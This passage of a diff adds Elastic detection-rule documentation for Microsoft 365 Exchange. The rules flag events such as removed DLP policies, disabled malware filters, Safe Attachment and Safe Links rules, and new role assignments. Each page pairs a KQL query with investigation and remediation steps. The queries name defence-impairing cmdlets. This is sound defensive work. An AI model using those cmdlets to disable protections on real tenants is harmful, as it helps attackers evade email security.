with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Set-DkimSigningConfig" and o365.audit.Parameters.Enabled:False and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc new file mode 100644 index 0000000000..6d36c0086f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed]] +=== Microsoft 365 Exchange DLP Policy Removed + +Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange DLP Policy Removed* + + +Data Loss Prevention (DLP) in Microsoft 365 Exchange is crucial for safeguarding sensitive information by monitoring and controlling data transfers. Adversaries may exploit this by removing DLP policies to bypass data monitoring, facilitating unauthorized data exfiltration. The detection rule identifies such actions by analyzing audit logs for specific events indicating successful DLP policy removal, thus alerting security teams to potential defense evasion tactics. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Remove-DlpPolicy" to identify the user account responsible for the action. +- Check the event.outcome field to confirm the success of the DLP policy removal and gather additional context from related logs. +- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies. +- Verify if the removed DLP policy was critical for protecting sensitive data and assess the potential impact of its removal. +- Contact the user or their manager to confirm if the DLP policy removal was authorized and legitimate. +- Examine any recent changes in permissions or roles for the user account to determine if they had the necessary privileges to remove the DLP policy. + + +*False positive analysis* + + +- Routine administrative changes to DLP policies by authorized personnel can trigger alerts. To manage this, maintain a list of authorized users and correlate their activities with policy changes to verify legitimacy. +- Scheduled updates or maintenance activities might involve temporary removal of DLP policies. Document these activities and create exceptions in the monitoring system for the duration of the maintenance window. +- Automated scripts or third-party tools used for policy management can inadvertently trigger false positives. Ensure these tools are properly documented and their actions are logged to differentiate between legitimate and suspicious activities. +- Changes in organizational policy or compliance requirements may necessitate the removal of certain DLP policies. Keep a record of such changes and adjust the monitoring rules to accommodate these legitimate actions. 
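+
+To support the verification steps above, the remaining policies and the audit trail for the removal can be reviewed from Exchange Online PowerShell. The following is a minimal sketch, assuming the ExchangeOnlineManagement module is installed and the investigating account holds the required compliance roles; the seven-day look-back is a placeholder, and tenants that manage DLP through Microsoft Purview may need the Security & Compliance cmdlets (for example, Get-DlpCompliancePolicy) rather than the classic Exchange cmdlet shown here.
+
+[source, powershell]
+----------------------------------
+# Connect to Exchange Online (interactive sign-in).
+Connect-ExchangeOnline
+
+# List the DLP policies that still exist so the removal can be compared against policy records.
+Get-DlpPolicy | Format-Table Name, Mode
+
+# Pull the audit trail for recent removals to confirm who ran Remove-DlpPolicy and when.
+Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) -EndDate (Get-Date) `
+    -Operations "Remove-DlpPolicy" -ResultSize 100 |
+    Select-Object CreationDate, UserIds, Operations, AuditData
+----------------------------------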
+ + +*Response and remediation* + + +- Immediately isolate the affected Microsoft 365 account to prevent further unauthorized actions and data exfiltration. +- Review the audit logs to identify any additional unauthorized changes or suspicious activities associated with the account or related accounts. +- Restore the removed DLP policy from a backup or recreate it based on the organization's standard configuration to re-enable data monitoring. +- Conduct a thorough investigation to determine the scope of data exposure and identify any data that may have been exfiltrated during the period the DLP policy was inactive. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional containment measures are necessary. +- Implement enhanced monitoring and alerting for similar events, focusing on unauthorized changes to security policies and configurations. +- Review and strengthen access controls and permissions for accounts with the ability to modify DLP policies to prevent unauthorized changes in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Remove-DlpPolicy" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc new file mode 100644 index 0000000000..9e9ce4f5f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion]] +=== Microsoft 365 Exchange Malware Filter Policy Deletion + +Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Malware Filter Policy Deletion* + + +Microsoft 365 Exchange uses malware filter policies to detect and alert administrators about malware in emails, crucial for maintaining security. Adversaries may delete these policies to bypass detection, facilitating undetected malware distribution. The detection rule monitors audit logs for successful deletions of these policies, signaling potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Remove-MalwareFilterPolicy" to identify the user account responsible for the deletion. +- Investigate the event.outcome to confirm the success of the policy deletion and gather additional context from related logs. +- Check the event.provider "Exchange" and event.category "web" to ensure the activity is consistent with expected administrative actions. +- Assess the recent activity of the identified user account for any unusual behavior or signs of compromise, such as unexpected login locations or times. +- Examine other security alerts or incidents involving the same user account or related systems to identify potential patterns or coordinated attacks. +- Verify if there are any recent changes in permissions or roles for the user account that could explain the ability to delete the malware filter policy. +- Coordinate with IT and security teams to determine if the deletion was authorized or if immediate remediation actions are necessary to restore security controls. + + +*False positive analysis* + + +- Administrative maintenance activities may trigger the rule if administrators are legitimately updating or removing outdated malware filter policies. To manage this, maintain a log of scheduled maintenance activities and cross-reference with alerts to verify legitimacy. +- Automated scripts or third-party tools used for policy management might inadvertently delete policies, leading to false positives. Ensure these tools are configured correctly and consider excluding their actions from the rule if they are verified as non-threatening. +- Changes in organizational policy or security strategy might necessitate the removal of certain malware filter policies. Document these changes and create exceptions in the detection rule for these specific actions to prevent unnecessary alerts. +- User error during policy management could result in accidental deletions. 
Implement additional verification steps or approval processes for policy deletions to reduce the likelihood of such errors triggering false positives. + + +*Response and remediation* + + +- Immediately isolate the affected account or system to prevent further unauthorized actions or malware distribution. +- Recreate the deleted malware filter policy to restore the email security posture and prevent further evasion attempts. +- Conduct a thorough review of recent audit logs to identify any other suspicious activities or policy changes that may indicate a broader compromise. +- Reset passwords and enforce multi-factor authentication for the affected account to secure access and prevent further unauthorized actions. +- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals a larger threat. +- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities or attempts to bypass security measures. +- Review and update security policies and configurations to ensure they are robust against similar evasion tactics in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Remove-MalwareFilterPolicy" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc new file mode 100644 index 0000000000..7491f45897 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification]] +=== Microsoft 365 Exchange Malware Filter Rule Modification + +Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Malware Filter Rule Modification* + + +Microsoft 365 Exchange uses malware filter rules to protect email systems by identifying and blocking malicious content. Adversaries may attempt to disable or remove these rules to bypass security measures and facilitate attacks. The detection rule monitors audit logs for successful actions that alter these rules, signaling potential defense evasion tactics. This helps security analysts quickly identify and respond to unauthorized modifications. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the rule modification. +- Identify the user account associated with the event.action:("Remove-MalwareFilterRule" or "Disable-MalwareFilterRule") and verify if the action was authorized or expected. +- Check the event.category:web logs for any related activities around the same timeframe to identify potential patterns or additional suspicious actions. +- Investigate the event.outcome:success to ensure that the modification was indeed successful and assess the impact on the organization's security posture. +- Correlate the identified actions with any recent security incidents or alerts to determine if this modification is part of a larger attack or threat campaign. +- Review the user's recent activity and access logs to identify any other unusual or unauthorized actions that may indicate compromised credentials or insider threat behavior. + + +*False positive analysis* + + +- Routine administrative changes to malware filter rules by authorized IT personnel can trigger alerts. To manage this, maintain a list of authorized users and their expected activities, and create exceptions for these users in the monitoring system. +- Scheduled maintenance or updates to Microsoft 365 configurations might involve temporary disabling of certain rules. Document these activities and adjust the monitoring system to recognize these as non-threatening. +- Automated scripts or third-party tools used for system management may perform actions that resemble rule modifications. Ensure these tools are properly documented and their actions are whitelisted if verified as safe. +- Changes made during incident response or troubleshooting can appear as rule modifications. 
Coordinate with the incident response team to log these activities and exclude them from triggering alerts. + + +*Response and remediation* + + +- Immediately isolate the affected user accounts and systems to prevent further unauthorized modifications to the malware filter rules. +- Re-enable or recreate the disabled or removed malware filter rules to restore the intended security posture of the Microsoft 365 environment. +- Conduct a thorough review of recent email traffic and logs to identify any potential malicious content that may have bypassed the filters during the period of rule modification. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or accounts have been compromised. +- Implement enhanced monitoring and alerting for any future attempts to modify malware filter rules, ensuring rapid detection and response. +- Review and update access controls and permissions for administrative actions within Microsoft 365 to limit the ability to modify security configurations to only essential personnel. +- Document the incident, including actions taken and lessons learned, to improve future response efforts and update incident response plans accordingly. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Remove-MalwareFilterRule" or "Disable-MalwareFilterRule") and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc new file mode 100644 index 0000000000..59994791db --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment]] +=== Microsoft 365 Exchange Management Group Role Assignment + +Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Management Group Role Assignment* + + +Microsoft 365 Exchange Management roles define permissions for managing Exchange environments. Adversaries may exploit this by assigning roles to unauthorized users, ensuring persistent access. The detection rule monitors successful role assignments within Exchange, flagging potential unauthorized changes that align with persistence tactics, thus aiding in identifying and mitigating unauthorized access attempts. + + +*Possible investigation steps* + + +- Review the event details to confirm the event.action is "New-ManagementRoleAssignment" and the event.outcome is "success" to ensure the alert is valid. +- Identify the user account associated with the role assignment by examining the event.dataset and event.provider fields, and verify if the account is authorized to make such changes. +- Check the history of role assignments for the identified user to determine if there are any patterns of unauthorized or suspicious activity. +- Investigate the specific management role that was assigned to understand its permissions and potential impact on the environment. +- Correlate this event with other recent activities from the same user or IP address to identify any additional suspicious behavior or anomalies. +- Consult with the relevant IT or security teams to verify if the role assignment was part of a legitimate administrative task or change request. + + +*False positive analysis* + + +- Routine administrative role assignments can trigger alerts. Regularly review and document legitimate role changes to differentiate them from unauthorized activities. +- Automated scripts or tools used for role management may cause false positives. Identify and whitelist these tools to prevent unnecessary alerts. +- Changes made during scheduled maintenance windows might be flagged. Establish a process to temporarily suppress alerts during these periods while ensuring post-maintenance reviews. +- Role assignments related to onboarding or offboarding processes can appear suspicious. Implement a verification step to confirm these changes align with HR records and expected activities. +- Frequent role changes by specific users with administrative privileges may not indicate malicious intent. Monitor these users' activities and establish a baseline to identify deviations from normal behavior. 
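+
+When an assignment cannot be tied to a documented change request, the assignee's current roles can be enumerated, and a confirmed unauthorized assignment removed, from Exchange Online PowerShell. This is a minimal sketch, assuming the ExchangeOnlineManagement module and sufficient RBAC rights; the user address and assignment name are placeholders.
+
+[source, powershell]
+----------------------------------
+# Connect to Exchange Online (interactive sign-in).
+Connect-ExchangeOnline
+
+# Enumerate every management role currently assigned to the account from the audit event.
+Get-ManagementRoleAssignment -RoleAssignee "user@example.com" |
+    Format-Table Name, Role, RoleAssigneeName, AssignmentMethod, WhenCreated
+
+# Remove an assignment that is confirmed unauthorized (prompts for confirmation).
+Remove-ManagementRoleAssignment -Identity "<assignment-name>" -Confirm:$true
+----------------------------------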
+ + +*Response and remediation* + + +- Immediately revoke the newly assigned management role from the unauthorized user to prevent further unauthorized access or changes. +- Conduct a thorough review of recent activity logs for the affected account to identify any suspicious actions taken since the role assignment. +- Reset the credentials of the compromised account and enforce multi-factor authentication to enhance security. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement additional monitoring on the affected account and similar high-privilege accounts to detect any further unauthorized attempts. +- Review and update access control policies to ensure that only authorized personnel can assign management roles in Microsoft 365. +- Consider conducting a security awareness session for administrators to reinforce the importance of monitoring and managing role assignments securely. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"New-ManagementRoleAssignment" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc new file mode 100644 index 0000000000..42b36a8fbd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled]] +=== Microsoft 365 Exchange Safe Attachment Rule Disabled + +Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Safe Attachment Rule Disabled* + + +Microsoft 365's Safe Attachment feature enhances security by analyzing email attachments in a secure environment to detect unknown malware. Disabling this rule can expose organizations to threats by allowing potentially harmful attachments to bypass scrutiny. Adversaries may exploit this to exfiltrate data or avoid detection. The detection rule monitors audit logs for successful attempts to disable this feature, signaling potential defense evasion activities. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Disable-SafeAttachmentRule" to identify the user or account responsible for the action. +- Check the event.outcome field to confirm the success of the rule being disabled and gather additional context from related logs around the same timestamp. +- Investigate the event.provider "Exchange" to determine if there are any other recent suspicious activities or changes made by the same user or account. +- Assess the event.category "web" to understand if there were any web-based interactions or anomalies that coincide with the disabling of the safe attachment rule. +- Evaluate the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats. +- Cross-reference the identified user or account with known insider threat indicators or previous security incidents to assess the likelihood of malicious intent. + + +*False positive analysis* + + +- Routine administrative changes can trigger alerts when IT staff disable Safe Attachment rules for legitimate reasons, such as testing or maintenance. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Automated scripts or third-party tools used for email management might disable Safe Attachment rules as part of their operations. Identify these tools and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses. +- Changes in organizational policy or security configurations might necessitate temporary disabling of Safe Attachment rules. Document these policy changes and adjust the monitoring rules to account for these temporary exceptions. +- Training or onboarding sessions for new IT staff might involve disabling Safe Attachment rules as part of learning exercises. 
Ensure these activities are logged and excluded from alerts by setting up temporary exceptions for training periods. + + +*Response and remediation* + + +- Immediately re-enable the Safe Attachment Rule in Microsoft 365 to restore the security posture and prevent further exposure to potentially harmful attachments. +- Conduct a thorough review of recent email logs and quarantine any suspicious attachments that were delivered during the period the rule was disabled. +- Isolate any systems or accounts that interacted with suspicious attachments to prevent potential malware spread or data exfiltration. +- Escalate the incident to the security operations team for further investigation and to determine if there was any unauthorized access or data compromise. +- Implement additional monitoring on the affected accounts and systems to detect any signs of ongoing or further malicious activity. +- Review and update access controls and permissions to ensure that only authorized personnel can modify security rules and configurations. +- Conduct a post-incident analysis to identify the root cause and implement measures to prevent similar incidents, such as enhancing alerting mechanisms for critical security rule changes. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Disable-SafeAttachmentRule" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc new file mode 100644 index 0000000000..1cdc4219b4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled]] +=== Microsoft 365 Exchange Safe Link Policy Disabled + +Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Safe Link Policy Disabled* + + +Microsoft 365's Safe Link policies enhance security by scanning hyperlinks in documents for phishing threats, even post-delivery. Disabling these policies can expose users to phishing attacks. Adversaries might exploit this by disabling Safe Links to facilitate malicious link delivery. The detection rule identifies successful attempts to disable Safe Link policies, signaling potential security breaches. + + +*Possible investigation steps* + + +- Review the event logs for the specific event.dataset:o365.audit and event.provider:Exchange to confirm the occurrence of the "Disable-SafeLinksRule" action with a successful outcome. +- Identify the user account associated with the event.action:"Disable-SafeLinksRule" to determine if the action was performed by an authorized individual or if the account may have been compromised. +- Check the recent activity of the identified user account for any unusual or unauthorized actions that could indicate a broader security incident. +- Investigate any recent changes to Safe Link policies in the Microsoft 365 environment to understand the scope and impact of the policy being disabled. +- Assess whether there have been any recent phishing attempts or suspicious emails delivered to users, which could exploit the disabled Safe Link policy. +- Coordinate with the IT security team to re-enable the Safe Link policy and implement additional monitoring to prevent future unauthorized changes. + + +*False positive analysis* + + +- Administrative changes: Legitimate administrative actions may involve disabling Safe Link policies temporarily for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Third-party integrations: Some third-party security tools or integrations might require Safe Link policies to be disabled for compatibility reasons. Identify and document these tools, and set up exceptions for their associated actions. +- Policy updates: During policy updates or migrations, Safe Link policies might be disabled as part of the process. Monitor and document these events, and exclude them from alerts if they match known update patterns. +- User training sessions: Safe Link policies might be disabled during user training or demonstrations to showcase potential threats. 
Schedule these sessions and exclude related activities from triggering alerts. + + +*Response and remediation* + + +- Immediately re-enable the Safe Link policy in Microsoft 365 to restore phishing protection for hyperlinks in documents. +- Conduct a thorough review of recent email and document deliveries to identify any potentially malicious links that may have been delivered while the Safe Link policy was disabled. +- Isolate any identified malicious links or documents and notify affected users to prevent interaction with these threats. +- Investigate the account or process that disabled the Safe Link policy to determine if it was compromised or misused, and take appropriate actions such as password resets or privilege revocation. +- Escalate the incident to the security operations team for further analysis and to determine if additional security measures are needed to prevent similar incidents. +- Implement additional monitoring and alerting for changes to Safe Link policies to ensure rapid detection of any future unauthorized modifications. +- Review and update access controls and permissions related to Safe Link policy management to ensure only authorized personnel can make changes. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Disable-SafeLinksRule" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc new file mode 100644 index 0000000000..4ebf607466 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation]] +=== Microsoft 365 Exchange Transport Rule Creation + +Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create 